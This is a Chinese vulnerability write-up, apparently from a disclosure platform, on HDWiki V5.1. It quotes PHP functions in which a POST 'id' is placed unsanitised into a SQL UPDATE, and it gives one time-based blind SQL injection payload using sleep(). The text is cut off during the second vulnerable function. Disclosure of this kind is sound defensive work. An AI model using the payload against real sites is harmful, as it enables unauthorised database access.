HDWiKi V5.1 盲注及xss

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: HDWiki 在经过前面的大牛洗礼之后,变得越来越安全了,小菜我也只能找到几个盲注和xss而已 PS:求别忽略 PSS:漏洞是自己的,rank是剑心的,所以.....你懂得 ~。~ ### 详细说明: 在经过前面的大牛洗礼之后,变得越来越安全了,get被不分青红皂白的过滤掉一堆关键字,get注入几乎是不大可能的了,所以我只找了post 1 ``` control/user.php 177 function doaegis(){ 178 $id=$this->post['id']; //vulnerable 179 if(empty($id)){ 180 $this->message(-1,'',2); 181 } 182 if($_ENV["comment"]->is_in_cookie('aegis',$id)){ 183 $this->message(-2,'',2); 184 } 185 $_ENV["comment"]->update_field('aegis',1,$id,0); 186 $this->message($id,'',2); 187 } model/comment.class.php 56 function update_field($field,$value,$id,$type=1){ 57 if($type){ 58 $sql="UPDATE ".DB_TABLEPRE."comment SET $field='$value' WHERE id= $id "; 59 }else{ 60 $sql="UPDATE ".DB_TABLEPRE."comment SET $field=$field+$value WHERE id= $id "; 61 } 62 $this->db->query($sql); 63 } ``` 提交id=1 and if(substr((select 1),1,1)=1,sleep(10),1) 实现盲注 2 ``` 189 function dooppose(){ 190 $id=$this->post['id']; //vulnerable 191 if(empty($id)){ 192 $this->message(-1,'',2); 193 } 194...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息